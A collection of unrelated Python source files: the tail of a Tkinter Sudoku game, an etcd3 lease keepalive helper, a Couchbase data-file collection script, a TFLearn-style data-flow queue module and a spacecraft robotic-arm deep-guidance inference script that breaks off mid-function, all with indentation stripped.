self.original_board[4] = [9, 2, 0, 8, 1, 0, 7, 0, 0]
self.original_board[5] = [4, 6, 0, 0, 0, 0, 5, 1, 9]
self.original_board[6] = [0, 1, 0, 0, 0, 0, 2, 3, 8]
self.original_board[7] = [8, 0, 0, 0, 4, 1, 0, 0, 0]
self.original_board[8] = [0, 0, 9, 0, 8, 0, 1, 0, 4]
elif self.which == 2:
self.original_board[0] = [0, 3, 0, 5, 0, 6, 2, 0, 0]
self.original_board[1] = [8, 2, 0, 0, 0, 1, 0, 0, 4]
self.original_board[2] = [6, 0, 7, 8, 3, 0, 0, 9, 1]
self.original_board[3] = [0, 0, 0, 0, 0, 0, 0, 2, 9]
self.original_board[4] = [5, 0, 0, 6, 0, 7, 0, 0, 3]
self.original_board[5] = [3, 9, 0, 0, 0, 0, 0, 0, 0]
self.original_board[6] = [4, 5, 0, 0, 8, 9, 1, 0, 2]
self.original_board[7] = [9, 0, 0, 1, 0, 0, 0, 4, 6]
self.original_board[8] = [0, 0, 3, 7, 0, 4, 0, 5, 0]
elif self.level.get() == 2:
if self.which == 0:
self.original_board[0] = [8, 0, 0, 0, 0, 0, 0, 0, 0]
self.original_board[1] = [0, 0, 3, 6, 0, 0, 0, 0, 0]
self.original_board[2] = [0, 7, 0, 0, 9, 0, 2, 0, 0]
self.original_board[3] = [0, 5, 0, 0, 0, 7, 0, 0, 0]
self.original_board[4] = [0, 0, 0, 0, 4, 5, 7, 0, 0]
self.original_board[5] = [0, 0, 0, 1, 0, 0, 0, 3, 0]
self.original_board[6] = [0, 0, 1, 0, 0, 0, 0, 6, 8]
self.original_board[7] = [0, 0, 8, 5, 0, 0, 0, 1, 0]
self.original_board[8] = [0, 9, 0, 0, 0, 0, 4, 0, 0]
elif self.which == 1:
self.original_board[0] = [2, 0, 0, 0, 0, 0, 0, 4, 3]
self.original_board[1] = [1, 9, 0, 0, 3, 0, 0, 0, 0]
self.original_board[2] = [0, 6, 0, 0, 0, 5, 0, 0, 0]
self.original_board[3] = [0, 5, 0, 2, 6, 0, 0, 0, 8]
self.original_board[4] = [0, 0, 0, 0, 7, 0, 0, 0, 0]
self.original_board[5] = [6, 0, 0, 0, 5, 3, 0, 1, 0]
self.original_board[6] = [0, 0, 0, 6, 0, 0, 0, 2, 0]
self.original_board[7] = [0, 0, 0, 0, 8, 0, 0, 3, 4]
self.original_board[8] = [9, 1, 0, 0, 0, 0, 0, 0, 6]
elif self.which == 2:
self.original_board[0] = [0, 0, 0, 0, 2, 0, 0, 0, 5]
self.original_board[1] = [0, 0, 1, 6, 0, 0, 0, 0, 0]
self.original_board[2] = [0, 6, 0, 7, 0, 0, 0, 8, 1]
self.original_board[3] = [0, 0, 0, 3, 0, 0, 5, 0, 0]
self.original_board[4] = [3, 0, 8, 5, 0, 6, 2, 0, 9]
self.original_board[5] = [0, 0, 4, 0, 0, 7, 0, 0, 0]
self.original_board[6] = [7, 4, 0, 0, 0, 9, 0, 1, 0]
self.original_board[7] = [0, 0, 0, 0, 0, 5, 9, 0, 0]
self.original_board[8] = [8, 0, 0, 0, 7, 0, 0, 0, 0]
self.current_board = copy.deepcopy(self.original_board)
self.__draw_puzzle()
def __draw_grid(self):
for i in range(10):
if i % 3 == 0:
color = "black"
else:
color = "gray"
x0 = MARGIN + i * SIDE
y0 = MARGIN
x1 = MARGIN + i * SIDE
y1 = HEIGHT_B - MARGIN
self.canvas.create_line(x0, y0, x1, y1, fill=color)
x0 = MARGIN
y0 = MARGIN + i * SIDE
x1 = WIDTH_B - MARGIN
y1 = MARGIN + i * SIDE
self.canvas.create_line(x0, y0, x1, y1, fill=color)
def __draw_puzzle(self):
self.canvas.delete("numbers")
self.time.set("Time: ")
self.n_bt.set("N. BT: ")
for i in range(9):
for j in range(9):
cell = self.current_board[i][j]
if cell != 0:
x = MARGIN + j * SIDE + SIDE / 2
y = MARGIN + i * SIDE + SIDE / 2
if str(cell) == str(self.original_board[i][j]):
self.canvas.create_text(x, y, text=cell, tags="numbers", fill="black")
else:
self.canvas.create_text(x, y, text=cell, tags="numbers", fill="red")
def __clear_board(self):
self.current_board = copy.deepcopy(self.original_board)
self.__draw_puzzle()
|
lease.py
|
"""
Sync lease util
"""
import sys
import threading
import time
from ..errors import ErrLeaseNotFound
from ..utils import log
from ..utils import retry
class Lease(object):
def __init__(self, client, ttl, ID=0, new=True):
"""
:type client: BaseClient
:param client: client instance of etcd3
:type ID: int
:param ID: ID is the requested ID for the lease. If ID is set to 0, the lessor chooses an ID.
:type new: bool
        :param new: whether to grant a new lease or maintain an existing lease by its ID [default: True]
"""
self.client = client
if ttl < 2:
ttl = 2
self.grantedTTL = ttl
if not new and not ID:
raise TypeError("should provide the lease ID if new=False")
self._ID = ID
self.new = new
self.last_grant = None
self.keeping = False
self.last_keep = None
self._keepalive_error = None
self._keepalive_exc_info = None
self._keepalive_keep_cb_error = None
self._keepalive_keep_cb_exc_info = None
self._keepalive_cancel_cb_error = None
self._keepalive_cancel_cb_exc_info = None
self._thread = None
self._lock = threading.Condition()
@property
def ID(self):
"""
Property: the id of the granted lease
:return: int
"""
return self._ID
def grant(self):
"""
        Grant a new lease when ``new`` is True, otherwise inherit the existing
        lease with the specified ID.
        When granting a new lease, if ID is set to 0 the lessor chooses an ID.
"""
if self.new:
r = self.client.lease_grant(self.grantedTTL, self.ID)
self.last_grant = time.time()
self._ID = r.ID
return r
else:
r = self.time_to_live()
if 'TTL' not in r:
ttl = -1
else:
ttl = r.TTL
if ttl == -1:
raise ErrLeaseNotFound
self.last_grant = time.time() - ttl
return r
def time_to_live(self, keys=False):
"""
Retrieves lease information.
:type keys: bool
        :param keys: whether to return the keys attached to the lease
"""
return self.client.lease_time_to_live(self.ID, keys=keys)
def ttl(self):
"""
        Get the TTL the lease has left
:return: int
"""
r = self.time_to_live()
if 'TTL' not in r:
return -1
return r.TTL
def alive(self):
"""
Tell if the lease is still alive
:return: bool
"""
return self.ttl() > 0
def keepalive_once(self):
"""
        Call keepalive once to refresh the TTL of the lease
"""
return self.client.lease_keep_alive_once(self.ID)
refresh = keepalive_once
def keepalive(self, keep_cb=None, cancel_cb=None):
"""
Start a daemon thread to constantly keep the lease alive
:type keep_cb: callable
:param keep_cb: callback function that will be called after every refresh
:type cancel_cb: callable
        :param cancel_cb: callback function that will be called after keepalive is cancelled
"""
if self.keeping:
raise RuntimeError("already keeping")
self.keeping = True
self._keepalive_error = None
self._keepalive_exc_info = None
def keepalived():
try:
with self._lock:
while self.keeping:
retry(self.keepalive_once, max_tries=3, log=log)
self.last_keep = time.time()
log.debug("keeping lease %d" % self.ID)
if keep_cb:
try:
keep_cb()
except Exception as e:
log.exception("keep_cb() raised an error")
self._keepalive_keep_cb_error = e
self._keepalive_keep_cb_exc_info = sys.exc_info()
for _ in range(int(self.grantedTTL / 2.0)): # keep per grantedTTL/4 seconds
if not self.keeping:
break
self._lock.wait(0.5)
log.debug("canceled keeping lease %d" % self.ID)
if cancel_cb:
try:
cancel_cb()
except Exception as e:
log.exception("cancel_cb() raised an error")
self._keepalive_cancel_cb_error = e
                        self._keepalive_cancel_cb_exc_info = sys.exc_info()
except Exception as e:
log.exception('error occurred while keeping alive lease')
self._keepalive_error = e
self._keepalive_exc_info = sys.exc_info()
t = self._thread = threading.Thread(target=keepalived)
        t.daemon = True
t.start()
def cancel_keepalive(self, join=True):
"""
stop keeping-alive
:type join: bool
        :param join: whether to wait for the keepalive thread to exit
"""
self.keeping = False
with self._lock:
self._lock.notify_all()
if join and self._thread and self._thread.is_alive():
self._thread.join()
def jammed(self):
"""
        Return True if the last keepalive refresh failed to happen in time
"""
if not self.keeping:
return False
return time.time() - self.last_keep > self.grantedTTL / 4.0
def revoke(self):
"""
revoke the lease
"""
log.debug("revoking lease %d" % self.ID)
self.cancel_keepalive(False)
return self.client.lease_revoke(self.ID)
def __enter__(self):
self.grant()
self.keepalive()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.cancel_keepalive()
self.revoke()
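# ----------------------------------------------------------------------
# Usage sketch (illustrative only, not part of the original module).
# `client` stands for an etcd3 client instance compatible with this Lease
# class; its construction and the `put(..., lease=...)` signature are
# assumptions, not guaranteed API.
#
#     with Lease(client, ttl=5) as lease:      # grant + background keepalive
#         client.put('/locks/job', 'worker-1', lease=lease.ID)
#         do_work()                            # hypothetical work function
#     # leaving the block cancels the keepalive thread and revokes the lease
# ----------------------------------------------------------------------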
|
collect_data_files.py
|
#!/usr/bin/env python
import getopt
import sys
import os
import time
from threading import Thread
from datetime import datetime
sys.path.extend(('.', 'lib'))
from lib.remote.remote_util import RemoteMachineShellConnection
from lib.membase.api.rest_client import RestConnection
import TestInput
def usage(error=None):
print """\
Syntax: collect_data_files.py [options]
Options
-i <file> Path to .ini file containing cluster information.
-p <key=val,...> Comma-separated key=value info.
Available keys:
path=<file_path> The destination path you want to put your zipped diag file
Example:
collect_data_files.py -i cluster.ini -p path=/tmp/nosql
"""
sys.exit(error)
class cbdatacollectRunner(object):
def __init__(self, server, path):
self.server = server
self.path = path
def __get_data_path(self, os_type):
data_path = None
node_info = RestConnection(self.server).get_nodes_self()
for storage in node_info.storage:
if storage.type == 'hdd':
data_path = storage.path
break
if os_type == 'windows':
# Windows server will return the path as c:/Program Files/Couchbase/Server/var/lib/couchbase/data
data_path = "/cygdrive/c{0}".format(data_path[data_path.find("/"):])
return data_path
def run(self):
remote_client = RemoteMachineShellConnection(self.server)
now = datetime.now()
day = now.day
month = now.month
year = now.year
hour = now.timetuple().tm_hour
minute = now.timetuple().tm_min
file_name = "%s-%s%s%s-%s%s-couch.tar.gz" % (self.server.ip,
month, day, year, hour,
minute)
print "Collecting data files from %s\n" % self.server.ip
remote_client.extract_remote_info()
data_path = self.__get_data_path(os_type=remote_client.info.type.lower())
output, error = remote_client.execute_command("tar -zcvf {0} '{1}' >/dev/null 2>&1".
format(file_name, data_path))
print "\n".join(output)
print "\n".join(error)
user_path = "/home/"
if self.server.ssh_username == "root":
user_path = "/"
remote_path = "%s%s" % (user_path, self.server.ssh_username)
status = remote_client.file_exists(remote_path, file_name)
if not status:
raise Exception("%s doesn't exists on server" % file_name)
status = remote_client.get_file(remote_path, file_name,
"%s/%s" % (self.path, file_name))
if not status:
raise Exception("Fail to download zipped logs from %s"
% self.server.ip)
remote_client.execute_command("rm -f %s" % os.path.join(remote_path, file_name))
remote_client.disconnect()
def main():
try:
(opts, _) = getopt.getopt(sys.argv[1:], 'hi:p', [])
for o, _ in opts:
if o == "-h":
usage()
_input = TestInput.TestInputParser.get_test_input(sys.argv)
if not _input.servers:
usage("ERROR: no servers specified. Please use the -i parameter.")
except IndexError:
usage()
except getopt.GetoptError, error:
usage("ERROR: " + str(error))
file_path = _input.param("path", ".")
remotes = (cbdatacollectRunner(server, file_path) for server in _input.servers)
remote_threads = [Thread(target=remote.run) for remote in remotes]
for remote_thread in remote_threads:
remote_thread.daemon = True
remote_thread.start()
run_time = 0
while remote_thread.isAlive() and run_time < 1200:
time.sleep(15)
run_time += 15
print "Waiting for another 15 seconds (time-out after 20 min)"
if run_time == 1200:
print "collect_data_files hung on this node. Jumping to next node"
print "collect data files done"
for remote_thread in remote_threads:
remote_thread.join(120)
if remote_thread.isAlive():
raise Exception("collect_data_files hung on remote node")
if __name__ == "__main__":
main()
|
data_flow.py
|
# -*- coding: utf-8 -*-
from __future__ import division, print_function, absolute_import
import numpy as np
import threading
try:
# Python 2
import Queue as queue
except Exception:
# Python 3
import queue
from . import utils
class DataFlow(object):
""" Data Flow.
Base class for using real time pre-processing and controlling data flow.
Supports pipelining for faster computation.
Arguments:
coord: `Coordinator`. A Tensorflow coordinator.
num_threads: `int`. Total number of simultaneous threads to process data.
max_queue: `int`. Maximum number of data stored in a queue.
        shuffle: `bool`. If True, data will be shuffled.
        continuous: `bool`. If True, when an epoch is over, the same data will be
            fed again.
        ensure_data_order: `bool`. Ensure that data order is kept when using
            'next' to retrieve data (processing will be slower).
dprep_dict: dict. Optional data pre-processing parameter for performing
real time data pre-processing. Keys must be placeholders and values
`DataPreprocessing` subclass object.
daug_dict: dict. Optional data augmentation parameter for performing
real time data augmentation. Keys must be placeholders and values
`DataAugmentation` subclass object.
"""
def __init__(self, coord, num_threads=8, max_queue=32, shuffle=False,
continuous=False, ensure_data_order=False,
dprep_dict=None, daug_dict=None):
self.coord = coord
self.num_threads = num_threads
self.max_queue = max_queue
self.shuffle = shuffle
self.continuous = continuous
if ensure_data_order:
self.num_threads = 1
self.max_queue = 1
self.dprep_dict = dprep_dict
self.daug_dict = daug_dict
self.interrupted = False
class FeedDictFlow(DataFlow):
""" FeedDictFlow.
    Generate a stream of batches from a dataset. It uses two queues, one for
    generating batches of data ids, and the other one to load data and apply
    pre-processing. If continuous is `True`, the data flow never ends until
    `stop` is invoked, or `coord` interrupts the threads.
Arguments:
feed_dict: `dict`. A TensorFlow formatted feed dict (with placeholders
as keys and data as values).
coord: `Coordinator`. A Tensorflow coordinator.
num_threads: `int`. Total number of simultaneous threads to process data.
max_queue: `int`. Maximum number of data stored in a queue.
        shuffle: `bool`. If True, data will be shuffled.
        continuous: `bool`. If True, when an epoch is over, the same data will be
            fed again.
        ensure_data_order: `bool`. Ensure that data order is kept when using
            'next' to retrieve data (processing will be slower).
dprep_dict: dict. Optional data pre-processing parameter for performing
real time data pre-processing. Keys must be placeholders and values
`DataPreprocessing` subclass object.
daug_dict: dict. Optional data augmentation parameter for performing
real time data augmentation. Keys must be placeholders and values
`DataAugmentation` subclass object.
index_array: `list`. An optional list of index to be used instead of
using the whole dataset indexes (Useful for validation split).
"""
def __init__(self, feed_dict, coord, batch_size=128, num_threads=8,
max_queue=32, shuffle=False, continuous=False,
ensure_data_order=False, dprep_dict=None, daug_dict=None,
index_array=None):
super(FeedDictFlow, self).__init__(coord, num_threads, max_queue,
shuffle, continuous,
ensure_data_order,
dprep_dict,
daug_dict)
self.feed_dict = feed_dict
self.batch_size = batch_size
self.n_samples = len(utils.get_dict_first_element(feed_dict))
# Queue holding batch ids
self.batch_ids_queue = queue.Queue(self.max_queue)
# Queue holding data ready feed dicts
self.feed_dict_queue = queue.Queue(self.max_queue)
# Create samples index array
self.index_array = np.arange(self.n_samples)
if index_array is not None:
self.index_array = index_array
self.n_samples = len(index_array)
# Create batches
self.batches = self.make_batches()
self.reset_batches()
# Data Recording
self.data_status = DataFlowStatus(self.batch_size, self.n_samples)
def next(self, timeout=None):
""" next.
Get the next feed dict.
Returns:
A TensorFlow feed dict, or 'False' if it has no more data.
"""
self.data_status.update()
return self.feed_dict_queue.get(timeout=timeout)
def start(self, reset_status=True):
""" start.
Arguments:
reset_status: `bool`. If True, `DataStatus` will be reset.
Returns:
"""
# Start to process data and fill queues
self.clear_queues()
self.interrupted = False
# Reset Data Status
if reset_status:
self.data_status.reset()
# Only a single thread needed for batches ids
bi_threads = [threading.Thread(target=self.fill_batch_ids_queue)]
# Multiple threads available for feed batch pre-processing
fd_threads = [threading.Thread(target=self.fill_feed_dict_queue)
for i in range(self.num_threads)]
self.threads = bi_threads + fd_threads
for t in self.threads:
t.start()
def stop(self):
""" stop.
Stop the queue from creating more feed_dict.
"""
# Send stop signal to processing queue
for i in range(self.num_threads):
self.batch_ids_queue.put(False)
# Launch a Thread to wait for processing scripts to finish
threading.Thread(target=self.wait_for_threads).start()
def reset(self):
""" reset.
Reset batch index.
"""
self.batch_index = -1
def interrupt(self):
# Send interruption signal to processing queue
self.interrupted = True
self.clear_queues()
def fill_feed_dict_queue(self):
while not self.coord.should_stop() and not self.interrupted:
batch_ids = self.batch_ids_queue.get()
if batch_ids is False:
break
data = self.retrieve_data(batch_ids)
# Apply augmentation according to daug dict
if self.daug_dict:
for k in self.daug_dict:
data[k] = self.daug_dict[k].apply(data[k])
# Apply preprocessing according to dprep dict
if self.dprep_dict:
for k in self.dprep_dict:
data[k] = self.dprep_dict[k].apply(data[k])
            # All prepped, put the data into the queue
self.feed_dict_queue.put(data)
def fill_batch_ids_queue(self):
while not self.coord.should_stop() and not self.interrupted:
ids = self.next_batch_ids()
if ids is False:
break
self.batch_ids_queue.put(ids)
def next_batch_ids(self):
self.batch_index += 1
if self.batch_index == len(self.batches):
if not self.continuous:
self.stop()
return False
self.reset_batches()
batch_start, batch_end = self.batches[self.batch_index]
return self.index_array[batch_start:batch_end]
def retrieve_data(self, batch_ids):
feed_batch = {}
for key in self.feed_dict:
feed_batch[key] = \
utils.slice_array(self.feed_dict[key], batch_ids)
return feed_batch
def reset_batches(self):
if self.shuffle:
self.shuffle_samples()
# Generate new batches
self.batches = self.make_batches()
self.batch_index = -1
def make_batches(self):
return utils.make_batches(self.n_samples, self.batch_size)
def shuffle_samples(self):
np.random.shuffle(self.index_array)
def wait_for_threads(self):
# Wait for threads to finish computation (max 120s)
self.coord.join(self.threads)
# Send end signal to indicate no more data in feed queue
self.feed_dict_queue.put(False)
def clear_queues(self):
""" clear_queues.
Clear queues.
"""
while not self.feed_dict_queue.empty():
self.feed_dict_queue.get()
while not self.batch_ids_queue.empty():
self.batch_ids_queue.get()
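# Usage sketch (illustrative only; the placeholders, arrays and `train_op` are
# assumptions, and `coord` is the TF 1.x Coordinator this class expects):
#
#     coord = tf.train.Coordinator()
#     flow = FeedDictFlow({X_ph: X, Y_ph: Y}, coord, batch_size=64, shuffle=True)
#     flow.start()
#     batch = flow.next()                 # a feed dict, or False when the epoch ends
#     while batch is not False:
#         sess.run(train_op, feed_dict=batch)
#         batch = flow.next()
#     coord.join(flow.threads)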
class TFRecordsFlow(DataFlow):
def __init__(self, coord):
super(TFRecordsFlow, self).__init__(coord)
raise NotImplementedError
class DataFlowStatus(object):
""" Data Flow Status
Simple class for recording how many data have been processed.
"""
def __init__(self, batch_size, n_samples):
self.step = 0
self.epoch = 0
self.current_iter = 0
self.batch_size = batch_size
self.n_samples = n_samples
def update(self):
self.step += 1
self.current_iter = min(self.step * self.batch_size, self.n_samples)
if self.current_iter == self.n_samples:
self.epoch += 1
self.step = 0
def reset(self):
self.step = 0
self.epoch = 0
|
use_deep_guidance_arm.py
|
"""
This script loads in a trained policy neural network and uses it for inference.
Typically this script will be executed on the Nvidia Jetson TX2 board during an
experiment in the Spacecraft Robotics and Control Laboratory at Carleton
University.
Script created: June 12, 2019
@author: Kirk (khovell@gmail.com)
"""
import tensorflow as tf
import numpy as np
import socket
import time
import threading
from collections import deque
# import code # for debugging
#code.interact(local=dict(globals(), **locals())) # Ctrl+D or Ctrl+Z to continue execution
try:
from settings import Settings
except:
print("You must load the 'manipulator' environment in settings\n\nQuitting.")
raise SystemExit
from build_neural_networks import BuildActorNetwork
assert Settings.ENVIRONMENT == 'manipulator'
# Load an environment to use methods from
environment_file = __import__('environment_' + Settings.ENVIRONMENT) # importing the environment
"""
*# Relative pose expressed in the chaser's body frame; everything else in Inertial frame #*
Deep guidance output in x and y are in the chaser body frame
"""
# Are we testing?
testing = False
CHECK_VELOCITY_LIMITS_IN_PYTHON = True
HARD_CODE_TARGET_SPIN_TO_ZERO = True
###############################
### User-defined parameters ###
###############################
offset_x = 0.0 # Position offset of the target in its body frame
offset_y = 0.0 # Position offset of the target in its body frame
offset_angle = 0 # Angle offset of the target in its body frame
# Do you want to debug with constant accelerations?
DEBUG_CONTROLLER_WITH_CONSTANT_ACCELERATIONS = False
constant_Ax = 0 # [m/s^2] in inertial frame
constant_Ay = 0 # [m/s^2] in inertial frame
constant_alpha = 0 # [rad/s^2] in inertial frame
constant_alpha_shoulder = 0 # [rad/s^2]
constant_alpha_elbow = 0 # [rad/s^2]
constant_alpha_wrist = 0 # [rad/s^2]
def make_C_bI(angle):
C_bI = np.array([[ np.cos(angle), np.sin(angle)],
[-np.sin(angle), np.cos(angle)]]) # [2, 2]
return C_bI
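# make_C_bI(angle) builds the 2-D direction cosine matrix that rotates a vector
# from the inertial frame into the chaser body frame; its transpose performs the
# inverse rotation (used below for the target offsets and guidance commands).
# Quick sanity check (illustrative): make_C_bI(np.pi/2) @ [1, 0] ~= [0, -1].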
class MessageParser:
def __init__(self, testing, client_socket, messages_to_deep_guidance, stop_run_flag):
print("Initializing Message Parser!")
self.client_socket = client_socket
self.messages_to_deep_guidance = messages_to_deep_guidance
self.stop_run_flag = stop_run_flag
self.testing = testing
# Items from the Pi
self.Pi_time = 0
self.Pi_red_x = 0
self.Pi_red_y = 0
self.Pi_red_theta = 0
self.Pi_red_Vx = 0
self.Pi_red_Vy = 0
self.Pi_red_omega = 0
self.Pi_black_x = 0
self.Pi_black_y = 0
self.Pi_black_theta = 0
self.Pi_black_Vx = 0
self.Pi_black_Vy = 0
self.Pi_black_omega = 0
self.shoulder_theta = 0
self.elbow_theta = 0
self.wrist_theta = 0
self.shoulder_omega = 0
self.elbow_omega = 0
self.wrist_omega = 0
print("Done initializing parser!")
def run(self):
print("Running Message Parser!")
# Run until we want to stop
while not self.stop_run_flag.is_set():
if self.testing:
# Assign test values
# Items from the Pi
self.Pi_time = 15
self.Pi_red_x = 3
self.Pi_red_y = 1
self.Pi_red_theta = 0.5
self.Pi_red_Vx = 0
self.Pi_red_Vy = 0
self.Pi_red_omega = 0
self.Pi_black_x = 1
self.Pi_black_y = 1
self.Pi_black_theta = 3.1
self.Pi_black_Vx = 0
self.Pi_black_Vy = 0
self.Pi_black_omega = 0
self.shoulder_theta = 1
self.elbow_theta = 1.2
self.wrist_theta = 0.5
self.shoulder_omega = 0
self.elbow_omega = 0
self.wrist_omega = 0
else:
# It's real
try:
data = self.client_socket.recv(4096) # Read the next value
except socket.timeout:
print("Socket timeout")
continue
data_packet = np.array(data.decode("utf-8").splitlines())
#print('Got message: ' + str(data.decode("utf-8")))
# We received a packet from the Pi
# input_data_array is: [time, red_x, red_y, red_angle, red_vx, red_vy, red_dangle, black_x, black_y, black_angle, black_vx, black_vy, black_dangle, shoulder_angle, elbow_angle, wrist_angle, shoulder_omega, elbow_omega, wrist_omega]
self.Pi_time, self.Pi_red_x, self.Pi_red_y, self.Pi_red_theta, self.Pi_red_Vx, self.Pi_red_Vy, self.Pi_red_omega, self.Pi_black_x, self.Pi_black_y, self.Pi_black_theta, self.Pi_black_Vx, self.Pi_black_Vy, self.Pi_black_omega, self.shoulder_theta, self.elbow_theta, self.wrist_theta, self.shoulder_omega, self.elbow_omega, self.wrist_omega = data_packet.astype(np.float32)
if HARD_CODE_TARGET_SPIN_TO_ZERO:
self.Pi_black_omega = 0.0
# Apply the offsets to the target
offsets_target_body = np.array([offset_x, offset_y])
offsets_target_inertial = np.matmul(make_C_bI(self.Pi_black_theta).T, offsets_target_body)
self.Pi_black_x = self.Pi_black_x - offsets_target_inertial[0]
self.Pi_black_y = self.Pi_black_y - offsets_target_inertial[1]
self.Pi_black_theta = self.Pi_black_theta - offset_angle
print("Pi Packet! Time: %.1f, Wrist angle: %.1f deg" %(self.Pi_time, self.wrist_theta*180/np.pi))
# Write the data to the queue for DeepGuidanceModelRunner to use!
""" This queue is thread-safe. If I append multiple times without popping, the data in the queue is overwritten. Perfect! """
#(self.Pi_time, self.Pi_red_x, self.Pi_red_y, self.Pi_red_theta, self.Pi_red_Vx, self.Pi_red_Vy, self.Pi_red_omega, self.Pi_black_x, self.Pi_black_y, self.Pi_black_theta, self.Pi_black_Vx, self.Pi_black_Vy, self.Pi_black_omega, self.shoulder_theta, self.elbow_theta, self.wrist_theta, self.shoulder_omega, self.elbow_omega, self.wrist_omega)
self.messages_to_deep_guidance.append((self.Pi_time, self.Pi_red_x, self.Pi_red_y, self.Pi_red_theta, self.Pi_red_Vx, self.Pi_red_Vy, self.Pi_red_omega, self.Pi_black_x, self.Pi_black_y, self.Pi_black_theta, self.Pi_black_Vx, self.Pi_black_Vy, self.Pi_black_omega, self.shoulder_theta, self.elbow_theta, self.wrist_theta, self.shoulder_omega, self.elbow_omega, self.wrist_omega))
print("Message handler gently stopped")
class DeepGuidanceModelRunner:
def __init__(self, testing, client_socket, messages_to_deep_guidance, stop_run_flag):
print("Initializing deep guidance model runner")
self.client_socket = client_socket
self.messages_to_deep_guidance = messages_to_deep_guidance
self.stop_run_flag = stop_run_flag
self.testing = testing
# Initializing a variable to check if we've docked
self.have_we_docked = 0.
# Holding the previous position so we know when SPOTNet gives a new update
self.previousSPOTNet_relative_x = 0.0
# Initialize an environment so we can use its methods
self.environment = environment_file.Environment()
self.environment.reset(False)
# Uncomment this on TF2.0
#tf.compat.v1.disable_eager_execution()
# Clear any old graph
tf.reset_default_graph()
# Initialize Tensorflow, and load in policy
self.sess = tf.Session()
# Building the policy network
self.state_placeholder = tf.placeholder(dtype = tf.float32, shape = [None, Settings.OBSERVATION_SIZE], name = "state_placeholder")
self.actor = BuildActorNetwork(self.state_placeholder, scope='learner_actor_main')
# Loading in trained network weights
print("Attempting to load in previously-trained model\n")
saver = tf.train.Saver() # initialize the tensorflow Saver()
# Try to load in policy network parameters
try:
ckpt = tf.train.get_checkpoint_state('../')
saver.restore(self.sess, ckpt.model_checkpoint_path)
print("\nModel successfully loaded!\n")
except (ValueError, AttributeError):
print("Model: ", ckpt.model_checkpoint_path, " not found... :(")
raise SystemExit
print("Done initializing model!")
def run(self):
print("Running Deep Guidance!")
counter = 1
# Parameters for normalizing the input
relevant_state_mean = np.delete(Settings.STATE_MEAN, Settings.IRRELEVANT_STATES)
relevant_half_range = np.delete(Settings.STATE_HALF_RANGE, Settings.IRRELEVANT_STATES)
# To log data
data_log = []
# Run zeros through the policy to ensure all libraries are properly loaded in
deep_guidance = self.sess.run(self.actor.action_scaled, feed_dict={self.state_placeholder:np.zeros([1, Settings.OBSERVATION_SIZE])})[0]
# Run until we want to stop
        while not self.stop_run_flag.is_set():
# Total state is [relative_x, relative_y, relative_vx, relative_vy, relative_angle, relative_angular_velocity, chaser_x, chaser_y, chaser_theta, target_x, target_y, target_theta, chaser_vx, chaser_vy, chaser_omega, target_vx, target_vy, target_omega] *# Relative pose expressed in the chaser's body frame; everything else in Inertial frame #*
# Network input: [relative_x, relative_y, relative_angle, chaser_theta, chaser_vx, chaser_vy, chaser_omega, target_omega] ** Normalize it first **
# Get data from Message Parser
try:
Pi_time, Pi_red_x, Pi_red_y, Pi_red_theta, \
Pi_red_Vx, Pi_red_Vy, Pi_red_omega, \
Pi_black_x, Pi_black_y, Pi_black_theta, \
Pi_black_Vx, Pi_black_Vy, Pi_black_omega, \
shoulder_theta, elbow_theta, wrist_theta, \
shoulder_omega, elbow_omega, wrist_omega = self.messages_to_deep_guidance.pop()
except IndexError:
                # Queue was empty, try again
continue
#############################
### Check if we've docked ###
#############################
# Check the reward function based off this state
self.environment.chaser_position = np.array([Pi_red_x, Pi_red_y, Pi_red_theta])
self.environment.chaser_velocity = np.array([Pi_red_Vx, Pi_red_Vy, Pi_red_omega])
self.environment.target_position = np.array([Pi_black_x, Pi_black_y, Pi_black_theta])
self.environment.target_velocity = np.array([Pi_black_Vx, Pi_black_Vy, Pi_black_omega])
self.environment.arm_angles = np.array([shoulder_theta, elbow_theta, wrist_theta])
self.environment.arm_angular_rates = np.array([shoulder_omega, elbow_omega, wrist_omega])
# Get environment to check for collisions
self.environment.update_end_effector_and_docking_locations()
self.environment.update_end_effector_location_body_frame()
self.environment.update_relative_pose_body_frame()
self.environment.check_collisions()
# Ask the environment whether docking occurred
self.have_we_docked = np.max([self.have_we_docked, float(self.environment.docked)])
# Extracting end-effector position and docking port position in the Inertial frame
end_effector_position = self.environment.end_effector_position
docking_port_position = self.environment.docking_port_position
# Calculating relative position between the docking port and the end-effector in the Target's body frame
docking_error_inertial = end_effector_position - docking_port_position
docking_error_target_body = np.matmul(make_C_bI(Pi_black_theta), docking_error_inertial)
print("Distance from cone to end-effector in target body frame: ", docking_error_target_body, " Environment thinks we've docked: ", self.have_we_docked, " with offsets: ", offset_x, offset_y, offset_angle)
#################################
### Building the Policy Input ###
#################################
total_state = self.environment.make_total_state()
policy_input = np.delete(total_state, Settings.IRRELEVANT_STATES)
# Normalizing
if Settings.NORMALIZE_STATE:
normalized_policy_input = (policy_input - relevant_state_mean)/relevant_half_range
else:
normalized_policy_input = policy_input
# Reshaping the input
normalized_policy_input = normalized_policy_input.reshape([-1, Settings.OBSERVATION_SIZE])
# Run processed state through the policy
deep_guidance = self.sess.run(self.actor.action_scaled, feed_dict={self.state_placeholder:normalized_policy_input})[0] # [accel_x, accel_y, alpha]
# Rotating the command into the inertial frame
if not Settings.ACTIONS_IN_INERTIAL:
deep_guidance[0:2] = np.matmul(make_C_bI(Pi_red_theta).T,deep_guidance[0:2])
# Commanding constant values in the inertial frame for testing purposes
if DEBUG_CONTROLLER_WITH_CONSTANT_ACCELERATIONS:
deep_guidance[0] = constant_Ax # [m/s^2]
deep_guidance[1] = constant_Ay # [m/s^2]
deep_guidance[2] = constant_alpha # [rad/s^2]
deep_guidance[3] = constant_alpha_shoulder # [rad/s^2]
                deep_guidance[4] = constant_alpha_elbow # [rad/s^2]
deep_guidance[5] = constant_alpha_wrist # [rad/s^2]
#################################################################
### Cap output if we are exceeding the max allowable velocity ###
#################################################################
# Stopping the command of additional velocity when we are already at our maximum
""" The check for arm velocity exceeding has been transferred to Simulink - June 1, 2021 """
if CHECK_VELOCITY_LIMITS_IN_PYTHON:
current_velocity = np.array([Pi_red_Vx, Pi_red_Vy, Pi_red_omega])
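                # Element-wise cap: zero any commanded acceleration whose axis is already
                # past its velocity limit AND whose sign would push it further past it.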
deep_guidance[:len(current_velocity)][(np.abs(current_velocity) > Settings.VELOCITY_LIMIT[:len(current_velocity)]) & (np.sign(deep_guidance[:len(current_velocity)]) == np.sign(current_velocity))] = 0
# Return commanded action to the Raspberry Pi 3
if self.testing:
print(deep_guidance)
else:
